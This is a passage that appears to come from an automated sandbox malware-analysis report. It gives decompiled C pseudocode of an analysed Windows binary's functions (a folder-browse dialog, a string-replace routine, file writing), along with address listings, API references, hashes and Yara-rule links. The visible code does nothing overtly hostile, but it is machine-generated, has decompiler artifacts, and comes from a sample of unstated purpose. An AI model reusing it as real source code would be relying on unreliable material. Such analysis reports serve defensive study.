				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t74, _v4), _a24), _v4), _a12), _v16);
			}





























































                                                                                                                                                                      0x00401500
                                                                                                                                                                      0x00401500
                                                                                                                                                                      0x00401502
                                                                                                                                                                      0x00401507
                                                                                                                                                                      0x00401507
                                                                                                                                                                      0x0040150a
                                                                                                                                                                      0x00401511
                                                                                                                                                                      0x00401511
                                                                                                                                                                      0x00401514
                                                                                                                                                                      0x00401519
                                                                                                                                                                      0x00401522
                                                                                                                                                                      0x0040165a
                                                                                                                                                                      0x00401664
                                                                                                                                                                      0x0040166c
                                                                                                                                                                      0x0040166d
                                                                                                                                                                      0x00401672
                                                                                                                                                                      0x00401673
                                                                                                                                                                      0x00401675
                                                                                                                                                                      0x0040167a
                                                                                                                                                                      0x0040168c
                                                                                                                                                                      0x00401695
                                                                                                                                                                      0x00401696
                                                                                                                                                                      0x004016aa
                                                                                                                                                                      0x004016ae
                                                                                                                                                                      0x004016b3
                                                                                                                                                                      0x004016b6
                                                                                                                                                                      0x004016bb
                                                                                                                                                                      0x004016bc
                                                                                                                                                                      0x004016be
                                                                                                                                                                      0x004016c3
                                                                                                                                                                      0x004016d4
                                                                                                                                                                      0x004016dd
                                                                                                                                                                      0x004016de
                                                                                                                                                                      0x004016e4
                                                                                                                                                                      0x004016e9
                                                                                                                                                                      0x004016ea
                                                                                                                                                                      0x00401702
                                                                                                                                                                      0x0040170c
                                                                                                                                                                      0x0040170c
                                                                                                                                                                      0x00401715
                                                                                                                                                                      0x00401717
                                                                                                                                                                      0x0040171c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040172d
                                                                                                                                                                      0x0040172e
                                                                                                                                                                      0x00401732
                                                                                                                                                                      0x00401734
                                                                                                                                                                      0x00401762
                                                                                                                                                                      0x00401767
                                                                                                                                                                      0x00401768
                                                                                                                                                                      0x00401769
                                                                                                                                                                      0x00401770
                                                                                                                                                                      0x0040177a
                                                                                                                                                                      0x0040177f
                                                                                                                                                                      0x00401789
                                                                                                                                                                      0x00401792
                                                                                                                                                                      0x00401797
                                                                                                                                                                      0x00401852
                                                                                                                                                                      0x00401857
                                                                                                                                                                      0x00401858
                                                                                                                                                                      0x0040186b
                                                                                                                                                                      0x00401875
                                                                                                                                                                      0x0040187e
                                                                                                                                                                      0x0040187f
                                                                                                                                                                      0x00401884
                                                                                                                                                                      0x00401887
                                                                                                                                                                      0x0040189b
                                                                                                                                                                      0x0040189f
                                                                                                                                                                      0x004018ad
                                                                                                                                                                      0x004018b2
                                                                                                                                                                      0x004018bb
                                                                                                                                                                      0x004018bd
                                                                                                                                                                      0x004018be
                                                                                                                                                                      0x004018c1
                                                                                                                                                                      0x004018c8
                                                                                                                                                                      0x004018cd
                                                                                                                                                                      0x004018d0
                                                                                                                                                                      0x004018d5
                                                                                                                                                                      0x004018dc
                                                                                                                                                                      0x004018e1
                                                                                                                                                                      0x004018e8
                                                                                                                                                                      0x004018f2
                                                                                                                                                                      0x004018f7
                                                                                                                                                                      0x004018fd
                                                                                                                                                                      0x00401909
                                                                                                                                                                      0x0040179d
                                                                                                                                                                      0x0040179d
                                                                                                                                                                      0x004017a4
                                                                                                                                                                      0x004017a9
                                                                                                                                                                      0x004017aa
                                                                                                                                                                      0x004017ac
                                                                                                                                                                      0x004017b1
                                                                                                                                                                      0x004017b8
                                                                                                                                                                      0x004017be
                                                                                                                                                                      0x004017c3
                                                                                                                                                                      0x004017c4
                                                                                                                                                                      0x004017d7
                                                                                                                                                                      0x004017e2
                                                                                                                                                                      0x004017eb
                                                                                                                                                                      0x004017f0
                                                                                                                                                                      0x004017f6
                                                                                                                                                                      0x004017f9
                                                                                                                                                                      0x00401804
                                                                                                                                                                      0x00401809
                                                                                                                                                                      0x00401809
                                                                                                                                                                      0x0040180e
                                                                                                                                                                      0x00401812
                                                                                                                                                                      0x00401817
                                                                                                                                                                      0x0040181e
                                                                                                                                                                      0x00401823
                                                                                                                                                                      0x00401826
                                                                                                                                                                      0x00401830
                                                                                                                                                                      0x00401835
                                                                                                                                                                      0x0040183b
                                                                                                                                                                      0x00401847
                                                                                                                                                                      0x00401847
                                                                                                                                                                      0x00401736
                                                                                                                                                                      0x0040174f
                                                                                                                                                                      0x00401750
                                                                                                                                                                      0x00401758
                                                                                                                                                                      0x00401758
                                                                                                                                                                      0x00401916
                                                                                                                                                                      0x00401917
                                                                                                                                                                      0x00401917
                                                                                                                                                                      0x00401920
                                                                                                                                                                      0x00401528
                                                                                                                                                                      0x00401528
                                                                                                                                                                      0x00401531
                                                                                                                                                                      0x00401545
                                                                                                                                                                      0x00401545
                                                                                                                                                                      0x00401545
                                                                                                                                                                      0x00401533
                                                                                                                                                                      0x00401533
                                                                                                                                                                      0x0040153c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040153e
                                                                                                                                                                      0x0040153e
                                                                                                                                                                      0x0040153e
                                                                                                                                                                      0x0040153c
                                                                                                                                                                      0x00401547
                                                                                                                                                                      0x00401549
                                                                                                                                                                      0x00401560
                                                                                                                                                                      0x00401563
                                                                                                                                                                      0x0040156d
                                                                                                                                                                      0x0040157b
                                                                                                                                                                      0x00401580
                                                                                                                                                                      0x00401581
                                                                                                                                                                      0x00401583
                                                                                                                                                                      0x00401588
                                                                                                                                                                      0x00401590
                                                                                                                                                                      0x0040159a
                                                                                                                                                                      0x004015a3
                                                                                                                                                                      0x004015a4
                                                                                                                                                                      0x004015ad
                                                                                                                                                                      0x004015b2
                                                                                                                                                                      0x004015b4
                                                                                                                                                                      0x004015b6
                                                                                                                                                                      0x004015b7
                                                                                                                                                                      0x004015c2
                                                                                                                                                                      0x004015c7
                                                                                                                                                                      0x004015cc
                                                                                                                                                                      0x004015d1
                                                                                                                                                                      0x004015d5
                                                                                                                                                                      0x004015d6
                                                                                                                                                                      0x004015db
                                                                                                                                                                      0x004015de
                                                                                                                                                                      0x004015e3
                                                                                                                                                                      0x004015e8
                                                                                                                                                                      0x004015ed
                                                                                                                                                                      0x004015f3
                                                                                                                                                                      0x004015fd
                                                                                                                                                                      0x004015fd
                                                                                                                                                                      0x00401602
                                                                                                                                                                      0x00401602
                                                                                                                                                                      0x00401606
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401606
                                                                                                                                                                      0x00401615
                                                                                                                                                                      0x00401637
                                                                                                                                                                      0x00401640
                                                                                                                                                                      0x00401650
                                                                                                                                                                      0x00401650
                                                                                                                                                                      0x00401655
                                                                                                                                                                      0x0040195a

                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00405853
                                                                                                                                                                        • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                                                                                                                                                                        • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 00405920: wcsstr.MSVCRT ref: 00405961
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040DEBC
                                                                                                                                                                        • Part of subcall function 0040A665: wcsncpy.MSVCRT ref: 0040A683
                                                                                                                                                                        • Part of subcall function 0040A665: wcslen.MSVCRT ref: 0040A695
                                                                                                                                                                        • Part of subcall function 0040A665: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A6D5
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmpwcsstr
                                                                                                                                                                      • String ID: `A$"`A$*`A$.`A$.`A$.`A$2`A$2`A$2`A$b`A$b`A$b`A$b`A$b`A
                                                                                                                                                                      • API String ID: 4088865958-588743708
                                                                                                                                                                      • Opcode ID: 3205e27709590908737becba6e2f407843fa08291c61041918eba4dc29fd7f9d
                                                                                                                                                                      • Instruction ID: ee34c1dc759ec8b9afbcc9474be159e29596370e2cc13c49719891b07a5b0ef3
                                                                                                                                                                      • Opcode Fuzzy Hash: 3205e27709590908737becba6e2f407843fa08291c61041918eba4dc29fd7f9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 53B13FB5504701AED600FBA1DD8197F76A9EB98708F10C83FB044BA1E2CA3CDD599B6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004092F5, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                                      			E004092F5(void* __esi, intOrPtr _a4, wchar_t* _a8, intOrPtr _a12) {
				short _v2;
				long _v520;
				wchar_t* _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				void _v552;
				_Unknown_base(*)()* _v556;
				_Unknown_base(*)()* _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				short* _t39;
				_Unknown_base(*)()* _t42;
				signed int _t47;
				wchar_t* _t56;
				int _t59;
				short _t60;
				wchar_t* _t65;
				int _t66;
				intOrPtr _t67;
				void* _t68;
				intOrPtr _t70;
				wchar_t* _t72;
				struct HINSTANCE__* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t68 = __esi;
				_t74 =  &_v560;
				_t66 = 0;
				_t77 =  *0x4170e0 - _t66; // 0x0
				if(_t77 == 0) {
					 *0x4170e0 = 1;
					__imp__CoInitialize(0);
				}
				memset( &_v552, _t66, 0x20);
				_t75 = _t74 + 0xc;
				_t73 = LoadLibraryW(L"SHELL32.DLL");
				if(_t73 == 0) {
					L12:
					_t39 = E0040E200(0x104, _a12);
					_t64 = 0;
					 *_t39 = 0;
					goto L13;
				} else {
					_push(_t68);
					_v560 = GetProcAddress(_t73, "SHBrowseForFolderW");
					_t42 = GetProcAddress(_t73, "SHGetPathFromIDListW");
					_t65 = _a8;
					_v556 = _t42;
					if(_t65 == 0) {
						_t65 = 0x412024;
					}
					wcsncpy( &_v520, _t65, 0x103);
					_v2 = 0;
					_t47 = wcslen( &_v520);
					_t76 = _t75 + 0x10;
					_t64 = 0x5c;
					if(_t47 > 3 &&  *((intOrPtr*)(_t76 + 0x36 + _t47 * 2)) == _t64) {
						_t64 = 0;
						 *((short*)(_t76 + 0x36 + _t47 * 2)) = 0;
					}
					_v540 = _a4;
					_v552 = E00409471(_t64);
					_v536 = 0x50;
					_v532 = E004092B1;
					_v528 =  &_v520;
					E00409528(1);
					_t70 = _v564( &_v556);
					_v568 = _t70;
					E00409528(_t66);
					if(_t70 != 0) {
						_t56 = E0040E200(0x104, _a8);
						_t67 = _v572;
						_t72 = _t56;
						 *_t72 = 0;
						_v568(_t67, _t72);
						__imp__CoTaskMemFree();
						_t59 = wcslen(_t72);
						_t64 = _t67;
						_t66 = _t59;
						_t60 = 0x5c;
						if( *((intOrPtr*)(_t72 + _t66 * 2 - 2)) != _t60) {
							 *((short*)(_t72 + _t66 * 2)) = _t60;
							 *((short*)(_t72 + 2 + _t66 * 2)) = 0;
							_t66 = _t66 + 1;
						}
					}
					FreeLibrary(_t73);
					if(_t66 != 0) {
						L13:
						return E0040E350(_t64, 0x104 - _t66);
					} else {
						goto L12;
					}
				}
			}
































                                                                                                                                                                      0x004092f5
                                                                                                                                                                      0x004092f5
                                                                                                                                                                      0x004092fe
                                                                                                                                                                      0x00409300
                                                                                                                                                                      0x00409306
                                                                                                                                                                      0x00409309
                                                                                                                                                                      0x00409313
                                                                                                                                                                      0x00409313
                                                                                                                                                                      0x00409321
                                                                                                                                                                      0x00409326
                                                                                                                                                                      0x00409334
                                                                                                                                                                      0x0040933d
                                                                                                                                                                      0x0040944b
                                                                                                                                                                      0x00409453
                                                                                                                                                                      0x00409458
                                                                                                                                                                      0x0040945a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409343
                                                                                                                                                                      0x00409343
                                                                                                                                                                      0x00409358
                                                                                                                                                                      0x0040935c
                                                                                                                                                                      0x0040935e
                                                                                                                                                                      0x00409365
                                                                                                                                                                      0x0040936b
                                                                                                                                                                      0x0040936d
                                                                                                                                                                      0x0040936d
                                                                                                                                                                      0x0040937d
                                                                                                                                                                      0x00409384
                                                                                                                                                                      0x00409391
                                                                                                                                                                      0x00409396
                                                                                                                                                                      0x0040939b
                                                                                                                                                                      0x0040939f
                                                                                                                                                                      0x004093a8
                                                                                                                                                                      0x004093aa
                                                                                                                                                                      0x004093aa
                                                                                                                                                                      0x004093b6
                                                                                                                                                                      0x004093bf
                                                                                                                                                                      0x004093c9
                                                                                                                                                                      0x004093d1
                                                                                                                                                                      0x004093d9
                                                                                                                                                                      0x004093dd
                                                                                                                                                                      0x004093eb
                                                                                                                                                                      0x004093ee
                                                                                                                                                                      0x004093f2
                                                                                                                                                                      0x004093f9
                                                                                                                                                                      0x00409403
                                                                                                                                                                      0x00409408
                                                                                                                                                                      0x0040940c
                                                                                                                                                                      0x00409412
                                                                                                                                                                      0x00409415
                                                                                                                                                                      0x0040941a
                                                                                                                                                                      0x00409421
                                                                                                                                                                      0x00409426
                                                                                                                                                                      0x00409427
                                                                                                                                                                      0x0040942b
                                                                                                                                                                      0x00409431
                                                                                                                                                                      0x00409433
                                                                                                                                                                      0x00409439
                                                                                                                                                                      0x0040943e
                                                                                                                                                                      0x0040943e
                                                                                                                                                                      0x00409431
                                                                                                                                                                      0x00409440
                                                                                                                                                                      0x00409449
                                                                                                                                                                      0x0040945d
                                                                                                                                                                      0x0040946e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409449

                                                                                                                                                                      APIs
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00409313
                                                                                                                                                                        • Part of subcall function 0040E350: TlsGetValue.KERNEL32(0000001B,\\?\,?,0040968D,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E35A
                                                                                                                                                                      • memset.MSVCRT ref: 00409321
                                                                                                                                                                      • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
                                                                                                                                                                      • wcsncpy.MSVCRT ref: 0040937D
                                                                                                                                                                      • wcslen.MSVCRT ref: 00409391
                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0040941A
                                                                                                                                                                      • wcslen.MSVCRT ref: 00409421
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                                                                                                                                                      • String ID: $ A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                                                                                      • API String ID: 4193992262-128120239
                                                                                                                                                                      • Opcode ID: d5588915c1d38e9502f5e4006468ea80d97d5df85f2ef6855433996e1c219f47
                                                                                                                                                                      • Instruction ID: 1392e4e60208b56ee8b10dacf4ca704cd47aacd570b2ed0dd50540f2d7556013
                                                                                                                                                                      • Opcode Fuzzy Hash: d5588915c1d38e9502f5e4006468ea80d97d5df85f2ef6855433996e1c219f47
                                                                                                                                                                      • Instruction Fuzzy Hash: 81418571504300AAC720EF759C49A9FBBE8EF88744F00483FF945E3292D779D9458B6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004062B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                      			E004062B0() {
				signed int _t88;
				long _t89;
				signed int _t91;
				void* _t92;
				wchar_t* _t93;
				void* _t94;
				signed short* _t98;
				void _t99;
				int _t101;
				void* _t103;
				signed int _t105;
				wchar_t* _t106;
				void* _t107;
				wchar_t* _t109;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				signed int _t116;
				wchar_t* _t117;
				void* _t118;
				wchar_t* _t119;
				wchar_t* _t120;
				signed int _t121;
				signed short* _t122;
				void* _t123;
				signed int _t126;
				void* _t127;
				signed char _t128;
				void* _t131;
				signed int _t132;
				long* _t134;
				void* _t135;
				wchar_t* _t141;
				void* _t142;
				signed short* _t143;
				wchar_t* _t146;
				wchar_t* _t147;
				signed int _t149;
				signed int _t150;
				void* _t151;

				_t150 = 0;
				if( *(_t151 + 0x34) == 0) {
					 *(_t151 + 0x34) = 0x412024;
				}
				_t117 =  *(_t151 + 0x38);
				if(_t117 == 0) {
					_t117 = 0x412024;
					 *(_t151 + 0x38) = 0x412024;
				}
				if( *(_t151 + 0x3c) == _t150) {
					 *(_t151 + 0x3c) = 0x412024;
				}
				_t128 =  *(_t151 + 0x40);
				_t120 = 0x40530d;
				_t88 = _t128 & 0x00000001;
				 *(_t151 + 0x14) = _t88;
				if(_t88 == 0) {
					_t120 = L004052F5;
				}
				 *(_t151 + 0x40) = _t120;
				if( *(_t151 + 0x44) <= _t150) {
					 *(_t151 + 0x44) = 1;
				}
				_t147 = _t117;
				_t134 =  &(_t147[0]);
				do {
					_t89 =  *_t147;
					_t147 =  &(_t147[0]);
				} while (_t89 != 0);
				_t135 =  *(_t151 + 0x3c);
				_t149 = _t147 - _t134 >> 1;
				 *(_t151 + 0x10) = _t135 + 2;
				do {
					_t91 =  *_t135;
					_t135 = _t135 + 2;
				} while (_t91 != 0);
				_t137 = _t135 -  *(_t151 + 0x10) >> 1;
				 *(_t151 + 0x10) = _t135 -  *(_t151 + 0x10) >> 1;
				if((_t128 & 0x00000002) == 0) {
					_t92 = E0040E180(_t120,  *(_t151 + 0x34));
					 *(_t151 + 0x24) = _t92;
					if(_t92 != 0) {
						_push( *(_t151 + 0x34));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x34) = _t92;
					}
					_t93 = E0040E180(_t120, _t117);
					 *(_t151 + 0x28) = _t93;
					if(_t93 != 0) {
						_push(_t117);
						L00405313();
						_t117 = _t93;
						_t151 = _t151 + 4;
						 *(_t151 + 0x38) = _t117;
					}
					_t94 = E0040E180(_t120,  *(_t151 + 0x3c));
					 *(_t151 + 0x2c) = _t94;
					if(_t94 != 0) {
						_push( *(_t151 + 0x3c));
						L00405313();
						_t151 = _t151 + 4;
						 *(_t151 + 0x3c) = _t94;
					}
					_t121 =  *(_t151 + 0x44) +  *(_t151 + 0x44);
					 *(_t151 + 0x1c) = _t121;
					_t98 =  *(_t151 + 0x34) + 0xfffffffe + _t121;
					 *(_t151 + 0x20) = _t98;
					_t122 = _t98;
					 *(_t151 + 0x18) = _t122;
					if( *(_t151 + 0x48) != 0) {
						_t111 =  *_t122 & 0x0000ffff;
						if(_t111 != 0) {
							_t143 = _t122;
							do {
								if( *(_t151 + 0x14) != 0) {
									_t112 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
									_t151 = _t151 + 0xc;
									if(_t112 != 0) {
										goto L38;
									} else {
										goto L48;
									}
									goto L61;
								} else {
									if(_t111 !=  *_t117) {
										L38:
										_t143 =  &(_t143[1]);
										goto L39;
									} else {
										_t113 =  *((intOrPtr*)(_t151 + 0x4c))(_t143, _t117, _t149);
										_t151 = _t151 + 0xc;
										if(_t113 == 0) {
											L48:
											_t132 =  *(_t151 + 0x48);
											_t143 =  &(_t143[_t149]);
											_t150 = _t150 + 1;
											if(_t132 == 0xffffffff) {
												goto L39;
											} else {
												if(_t132 <= _t150) {
													break;
												} else {
													goto L39;
												}
											}
											L61:
											if( *(_t151 + 0x24) != 0) {
												free(_t118);
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x28) != 0) {
												free( *(_t151 + 0x38));
												_t151 = _t151 + 4;
											}
											if( *(_t151 + 0x2c) != 0) {
												free( *(_t151 + 0x3c));
												return _t91;
											}
											goto L67;
										} else {
											goto L38;
										}
									}
								}
								break;
								L39:
								_t111 =  *_t143 & 0x0000ffff;
							} while (_t111 != 0);
							_t137 =  *(_t151 + 0x10);
						}
					}
					_t118 =  *(_t151 + 0x34);
					_t123 = _t118;
					_t131 = _t123 + 2;
					do {
						_t99 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t99 != 0);
					_t141 = E0040E200((_t137 - _t149) * _t150 + (_t123 - _t131 >> 1),  *((intOrPtr*)(_t151 + 0x4c)));
					if(_t150 != 0) {
						_t101 =  *(_t151 + 0x44);
						if(_t101 > 1) {
							wcsncpy(_t141,  *(_t151 + 0x38), _t101);
							_t109 =  *(_t151 + 0x28);
							_t151 = _t151 + 0xc;
							_t118 =  *(_t151 + 0x20);
							_t141 = _t141 +  &(_t109[0]);
						}
						_t126 =  *_t118 & 0x0000ffff;
						while(_t126 != 0) {
							if(_t150 <= 0) {
								L58:
								 *_t141 =  *_t118;
								_t141 =  &(_t141[0]);
								_t118 = _t118 + 2;
							} else {
								if( *(_t151 + 0x14) != 0) {
									_t103 =  *((intOrPtr*)(_t151 + 0x4c))(_t118,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t103 != 0) {
										goto L58;
									} else {
										goto L69;
									}
									goto L70;
								} else {
									_t106 =  *(_t151 + 0x38);
									if(_t126 !=  *_t106) {
										goto L58;
									} else {
										_t107 =  *((intOrPtr*)(_t151 + 0x4c))(_t118, _t106, _t149);
										_t151 = _t151 + 0xc;
										if(_t107 == 0) {
											L69:
											wcsncpy(_t141,  *(_t151 + 0x40),  *(_t151 + 0x10));
											_t105 =  *(_t151 + 0x1c);
											_t118 = _t118 + _t149 * 2;
											_t151 = _t151 + 0xc;
											_t150 = _t150 - 1;
											_t141 = _t141 + _t105 * 2;
										} else {
											goto L58;
										}
									}
								}
							}
							_t126 =  *_t118 & 0x0000ffff;
						}
						_t118 =  *(_t151 + 0x34);
						_t91 = 0;
						 *_t141 = 0;
					} else {
						_t127 = _t118;
						_t142 = _t141 - _t118;
						do {
							_t91 =  *_t127 & 0x0000ffff;
							_t127 = _t127 + 2;
							 *(_t142 + _t127 - 2) = _t91;
						} while (_t91 != 0);
					}
					goto L61;
				} else {
					if(_t149 == 0) {
						L67:
						return _t91;
					} else {
						_t91 =  *(_t151 + 0x48);
						if(_t91 != 0) {
							_t146 =  *(_t151 + 0x34) + ( *(_t151 + 0x44) - 1) * 2;
							_t119 = _t146;
							if( *_t119 != _t150) {
								while(_t91 == 0xffffffff || _t91 > _t150) {
									_t114 =  *_t120(_t146,  *(_t151 + 0x3c), _t149);
									_t151 = _t151 + 0xc;
									if(_t114 != 0) {
										_t146 =  &(_t146[0]);
										_t119 =  &(_t119[0]);
									} else {
										wcsncpy(_t146,  *(_t151 + 0x40),  *(_t151 + 0x10));
										_t116 =  *(_t151 + 0x1c);
										_t119 = _t119 + _t149 * 2;
										_t151 = _t151 + 0xc;
										_t150 = _t150 + 1;
										_t146 = _t146 + _t116 * 2;
									}
									_t91 =  *(_t151 + 0x48);
									_t120 =  *(_t151 + 0x40);
									if( *_t119 != 0) {
										continue;
									} else {
										return _t91;
									}
									goto L70;
								}
							}
						}
						goto L67;
					}
				}
				L70:
			}












































                                                                                                                                                                      0x004062b5
                                                                                                                                                                      0x004062bd
                                                                                                                                                                      0x004062bf
                                                                                                                                                                      0x004062bf
                                                                                                                                                                      0x004062c7
                                                                                                                                                                      0x004062cd
                                                                                                                                                                      0x004062cf
                                                                                                                                                                      0x004062d4
                                                                                                                                                                      0x004062d4
                                                                                                                                                                      0x004062dc
                                                                                                                                                                      0x004062de
                                                                                                                                                                      0x004062de
                                                                                                                                                                      0x004062e6
                                                                                                                                                                      0x004062ea
                                                                                                                                                                      0x004062f1
                                                                                                                                                                      0x004062f4
                                                                                                                                                                      0x004062f8
                                                                                                                                                                      0x004062fa
                                                                                                                                                                      0x004062fa
                                                                                                                                                                      0x004062ff
                                                                                                                                                                      0x00406307
                                                                                                                                                                      0x00406309
                                                                                                                                                                      0x00406309
                                                                                                                                                                      0x00406311
                                                                                                                                                                      0x00406313
                                                                                                                                                                      0x00406316
                                                                                                                                                                      0x00406316
                                                                                                                                                                      0x00406319
                                                                                                                                                                      0x0040631c
                                                                                                                                                                      0x00406323
                                                                                                                                                                      0x00406327
                                                                                                                                                                      0x0040632c
                                                                                                                                                                      0x00406330
                                                                                                                                                                      0x00406330
                                                                                                                                                                      0x00406333
                                                                                                                                                                      0x00406336
                                                                                                                                                                      0x0040633f
                                                                                                                                                                      0x00406341
                                                                                                                                                                      0x00406348
                                                                                                                                                                      0x004063dd
                                                                                                                                                                      0x004063e2
                                                                                                                                                                      0x004063e8
                                                                                                                                                                      0x004063ea
                                                                                                                                                                      0x004063ee
                                                                                                                                                                      0x004063f3
                                                                                                                                                                      0x004063f6
                                                                                                                                                                      0x004063f6
                                                                                                                                                                      0x004063fb
                                                                                                                                                                      0x00406400
                                                                                                                                                                      0x00406406
                                                                                                                                                                      0x00406408
                                                                                                                                                                      0x00406409
                                                                                                                                                                      0x0040640e
                                                                                                                                                                      0x00406410
                                                                                                                                                                      0x00406413
                                                                                                                                                                      0x00406413
                                                                                                                                                                      0x0040641b
                                                                                                                                                                      0x00406420
                                                                                                                                                                      0x00406426
                                                                                                                                                                      0x00406428
                                                                                                                                                                      0x0040642c
                                                                                                                                                                      0x00406431
                                                                                                                                                                      0x00406434
                                                                                                                                                                      0x00406434
                                                                                                                                                                      0x00406440
                                                                                                                                                                      0x0040644a
                                                                                                                                                                      0x0040644e
                                                                                                                                                                      0x00406450
                                                                                                                                                                      0x00406454
                                                                                                                                                                      0x00406456
                                                                                                                                                                      0x0040645c
                                                                                                                                                                      0x0040645e
                                                                                                                                                                      0x00406464
                                                                                                                                                                      0x00406466
                                                                                                                                                                      0x00406468
                                                                                                                                                                      0x0040646d
                                                                                                                                                                      0x004064e8
                                                                                                                                                                      0x004064ec
                                                                                                                                                                      0x004064f1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040646f
                                                                                                                                                                      0x00406472
                                                                                                                                                                      0x00406482
                                                                                                                                                                      0x00406482
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406474
                                                                                                                                                                      0x00406477
                                                                                                                                                                      0x0040647b
